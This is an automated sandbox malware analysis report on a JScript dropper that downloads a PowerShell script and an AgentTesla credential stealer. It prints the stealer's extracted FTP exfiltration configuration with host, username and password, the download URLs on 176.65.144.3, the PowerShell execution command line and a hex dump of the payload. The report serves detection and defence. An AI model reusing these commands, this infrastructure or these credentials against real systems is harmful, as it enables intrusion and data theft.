Edit tour

Windows Analysis Report
PO_111101111001.js

Overview

General Information

Sample name:PO_111101111001.js
Analysis ID:1641301
MD5:984ab95962169d6866f83e5ac3a18dcf
SHA1:a8878632a281723efcfab0dba45bb8bde09f0ca7
SHA256:c5963972b61874eb1381324ed1bfefa927fc2acacc6ad789356e3bc32b92ebd1
Tags:AgentTeslajsuser-abuse_ch
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AgentTesla
Allocates memory in foreign processes
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
JavaScript source code contains functionality to generate code involving a shell, file or stream
PE file contains section with special chars
PE file has nameless sections
Potential obfuscated javascript found
Powershell drops PE file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: AspNetCompiler Execution
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • wscript.exe (PID: 7260 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_111101111001.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 8152 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • QWQWSAADAF.exe (PID: 2976 cmdline: "C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe" MD5: 509DA2F325053AC8CFC07C6EDDE04DE6)
        • aspnet_compiler.exe (PID: 5376 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{
  "Exfil Mode": "FTP",
  "Host": "ftp://176.65.144.3",
  "Username": "admin",
  "Password": "Admin56@@"
}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    0000000B.00000002.1367785643.0000000003FD9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      0000000B.00000002.1367785643.0000000003FD9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        0000000C.00000002.2446694240.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          0000000C.00000002.2446694240.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            0000000B.00000002.1367785643.0000000003F79000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 7 entries
              SourceRuleDescriptionAuthorStrings
              12.2.aspnet_compiler.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                12.2.aspnet_compiler.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  12.2.aspnet_compiler.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x345fd:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x3466f:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x346f9:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x3478b:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x347f5:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x34867:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x348fd:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x3498d:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                  12.2.aspnet_compiler.exe.400000.0.unpackMALWARE_Win_AgentTeslaV2AgenetTesla Type 2 Keylogger payloadditekSHen
                  • 0x31783:$s2: GetPrivateProfileString
                  • 0x30d7a:$s3: get_OSFullName
                  • 0x32505:$s5: remove_Key
                  • 0x326e8:$s5: remove_Key
                  • 0x335e8:$s6: FtpWebRequest
                  • 0x345df:$s7: logins
                  • 0x34b51:$s7: logins
                  • 0x37834:$s7: logins
                  • 0x37914:$s7: logins
                  • 0x39269:$s7: logins
                  • 0x384ae:$s9: 1.85 (Hash, version 2, native byte-order)
                  11.2.QWQWSAADAF.exe.3fd95b0.4.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 7 entries

                    System Summary

                    barindex
                    Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 176.65.144.3, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7260, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49721
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_111101111001.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_111101111001.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3964, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_111101111001.js", ProcessId: 7260, ProcessName: wscript.exe
                    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe, ParentProcessId: 2976, ParentProcessName: QWQWSAADAF.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 5376, ProcessName: aspnet_compiler.exe
                    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 176.65.144.3, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7260, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49721
                    Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_111101111001.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_111101111001.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3964, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_111101111001.js", ProcessId: 7260, ProcessName: wscript.exe
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_111101111001.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7260, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1", ProcessId: 8152, ProcessName: powershell.exe
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-03-18T08:03:19.242426+010020188561A Network Trojan was detected176.65.144.380192.168.2.449721TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: C:\Users\user\AppData\Local\Temp\RUNPEE.dllAvira: detection malicious, Label: HEUR/AGEN.1300034
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeAvira: detection malicious, Label: TR/Dropper.MSIL.Gen
                    Source: 11.2.QWQWSAADAF.exe.3fd95b0.4.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://176.65.144.3", "Username": "admin", "Password": "Admin56@@"}
                    Source: C:\Users\user\AppData\Local\Temp\RUNPEE.dllReversingLabs: Detection: 70%
                    Source: PO_111101111001.jsReversingLabs: Detection: 27%
                    Source: Binary string: WASCDZF.pdbTFnF source: QWQWSAADAF.exe, 0000000B.00000000.1339764750.00000000003B2000.00000002.00000001.01000000.0000000A.sdmp, QWQWSAADAF.exe.9.dr
                    Source: Binary string: WASCDZF.pdb source: QWQWSAADAF.exe, 0000000B.00000000.1339764750.00000000003B2000.00000002.00000001.01000000.0000000A.sdmp, QWQWSAADAF.exe.9.dr

                    Software Vulnerabilities

                    barindex
                    Source: PO_111101111001.jsReturn value : ['"WScript.Shell"', '"Failed to execute PowerShell script: "', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "']Go to definition
                    Source: PO_111101111001.jsArgument value : ['"WScript.Shell"', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\WTRTRWFSHS.ps1"",0,true', '"Failed to execute PowerShell script: "', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "']Go to definition
                    Source: PO_111101111001.jsReturn value : ['"WScript.Shell"', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\WTRTRWFSHS.ps1"",0,true', '"Failed to execute PowerShell script: "', '"Scripting.FileSystemObject"', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "']Go to definition
                    Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeCode function: 4x nop then jmp 00CF4CA7h11_2_00CF4B20
                    Source: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exeCode function: 4x nop then jmp 00CF4D0Eh11_2_00CF4B20

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2018856 - Severity 1 - ET MALWARE Windows executable base64 encoded : 176.65.144.3:80 -> 192.168.2.4:49721
                    Source: C:\Windows\System32\wscript.exeNetwork Connect: 176.65.144.3 80Jump to behavior
                    Source: PO_111101111001.jsReturn value : ['"http://176.65.144.3/dev/devil.ps1"']Go to definition
                    Source: PO_111101111001.jsArgument value : ['"http://176.65.144.3/dev/devil.ps1","C:\\Temp\\WTRTRWFSHS.ps1"']Go to definition
                    Source: PO_111101111001.jsArgument value : ['"http://176.65.144.3/dev/devil.ps1","C:\\Temp\\WTRTRWFSHS.ps1"']Go to definition
                    Source: PO_111101111001.jsArgument value : ['"GET","http://176.65.144.3/dev/devil.ps1",false']Go to definition
                    Source: PO_111101111001.jsReturn value : ['"http://176.65.144.3/dev/devil.ps1"', '"MSXML2.XMLHTTP"']Go to definition
                    Source: global trafficTCP traffic: 192.168.2.4:65080 -> 162.159.36.2:53
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 18 Mar 2025 07:03:22 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Tue, 11 Mar 2025 15:54:49 GMTETag: "3be00-630131bd532ab"Accept-Ranges: bytesContent-Length: 245248Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ea 78 a9 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 b2 03 00 00 0a 00 00 00 00 00 00 be d1 03 00 00 20 00 00 00 e0 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 68 d1 03 00 53 00 00 00 00 e0 03 00 1a 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 b1 03 00 00 20 00 00 00 b2 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 1a 07 00 00 00 e0 03 00 00 08 00 00 00 b4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 bc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 d1 03 00 00 00 00 00 48 00 00 00 02 00 05 00 94 9a 02 00 d4 36 01 00 03 00 00 00 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1d ac a8 f8 d3 b8 48 3e 48 7d 3e 0a 62 07 dd 26 e6 67 81 03 e7 b2 13 a5 b0 79 ee 4f 0f 41 15 ed 7b 14 8c e5 4b 46 0d c1 8e fe d6 e7 27 75 06 8b 49 00 dc 0f 30 a0 9e fd 09 85 f1 c8 aa 75 c1 08 05 79 01 e2 97 d8 af 80 38 60 0b 71 0e 68 53 77 2f 0f 61 f6 1d 8e 8f 5c b2 3d 21 74 40 4b b5 06 6e ab 7a bd 8b a9 7e 32 8f 6e 06 24 d9 29 a4 a5 be 26 23 fd ee f1 4c 0f 74 5e 58 fb 91 74 ef 91 63 6f 6d 2e 61 70 70 6c 65 2e 53 61 66 61 72 69 b9 02 fa 01 00 00 00 00 e1 f0 c3 d2 a5 b4 87 96 69 78 4b 5a 2d 03 0f 1e 34 12 78 56 ab 90 ef cd 34 12 78 56 ab 90 ef cd 7e 00 00 00 64 00 00 00 72 00 00 00 61 00 00 00 47 00 00 00 6f 00 00 00 6e 00 00 00 7e 00 00 00 7e 00 00 00 46 00 00 00 40 00 00 00 37 00 00 00 25 00 00 00 6d 00 00 00 24 00 00 00 7e 00 00 00 83 7d 0f 0f 8e b3 e8 69 73 af ff 00 00 00 00 00 35 e0 85 30 8a 6d 91 a3 96 5f f2 37 95 d1 cf 36 71 de 7e 5b 62 38 d5 fb db 64 a6 4b d3 5a 05 53
                    Source: global trafficHTTP traffic detected: GET /dev/DEV.exe HTTP/1.1Host: 176.65.144.3Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                    Source: Joe Sandbox ViewASN Name: PALTEL-ASPALTELAutonomousSystemPS PALTEL-ASPALTELAutonomousSystemPS
                    Source: unknownDNS query: name: ip-api.com
                    Source: global trafficHTTP traffic detected: GET /dev/devil.ps1 HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 176.65.144.3Connection: Keep-Alive
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                    Source: global trafficHTTP traffic detected: GET /dev/devil.ps1 HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 176.65.144.3Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /dev/DEV.exe HTTP/1.1Host: 176.65.144.3Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: ip-api.com
                    Source: global trafficDNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa
                    Source: global trafficDNS traffic detected: DNS query: 212.20.149.52.in-addr.arpa
                    Source: QWQWSAADAF.exe, 0000000B.00000002.1365843658.00000000027E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.65.144.3
                    Source: QWQWSAADAF.exe, 0000000B.00000002.1365843658.000000000277D000.00000004.00000800.00020000.00000000.sdmp, QWQWSAADAF.exe, 0000000B.00000002.1365843658.000000000277B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.65.144.3/dev/DEV.exe
                    Source: QWQWSAADAF.exe, 0000000B.00000002.1365843658.0000000002781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.65.144.3/dev/DEV.exeP
                    Source: wscript.exe, 00000000.00000003.1277176651.000001B28EBE7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1287676331.000001B28EBE5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1276110163.000001B28EBE5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1287267702.000001B28EBE5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1277355226.000001B28EBE5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1277719320.000001B28EBE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.65.144.3/dev/devil.ps1
                    Source: aspnet_compiler.exe, 0000000C.00000002.2454758646.0000000003276000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000002.2454758646.0000000003191000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000002.2454758646.0000000003258000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                    Source: QWQWSAADAF.exe, 0000000B.00000002.1367785643.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, QWQWSAADAF.exe, 0000000B.00000002.1367785643.0000000003F79000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000002.2454758646.0000000003191000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000002.2454758646.0000000003258000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000002.2446694240.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                    Source: powershell.exe, 00000009.00000002.1361439763.000001BED1E03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1361439763.000001BED1C5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1344482429.000001BEC3657000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000009.00000002.1344482429.000001BEC1E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000009.00000002.1344482429.000001BEC1BE1000.00000004.00000800.00020000.00000000.sdmp, QWQWSAADAF.exe, 0000000B.00000002.1365843658.00000000027E3000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000002.2454758646.0000000003191000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000002.2454758646.0000000003258000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000009.00000002.1344482429.000001BEC31F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: powershell.exe, 00000009.00000002.1344482429.000001BEC1E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: QWQWSAADAF.exe, 0000000B.00000002.1367785643.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, QWQWSAADAF.exe, 0000000B.00000002.1367785643.0000000003F79000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000002.2446694240.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: powershell.exe, 00000009.00000002.1344482429.000001BEC1BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                    Source: powershell.exe, 00000009.00000002.1344482429.000001BEC3657000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000009.00000002.1344482429.000001BEC3657000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000009.00000002.1344482429.000001BEC3657000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000009.00000002.1344482429.000001BEC1E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000009.00000002.1361439763.000001BED1E03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1361439763.000001BED1C5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1344482429.000001BEC3657000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
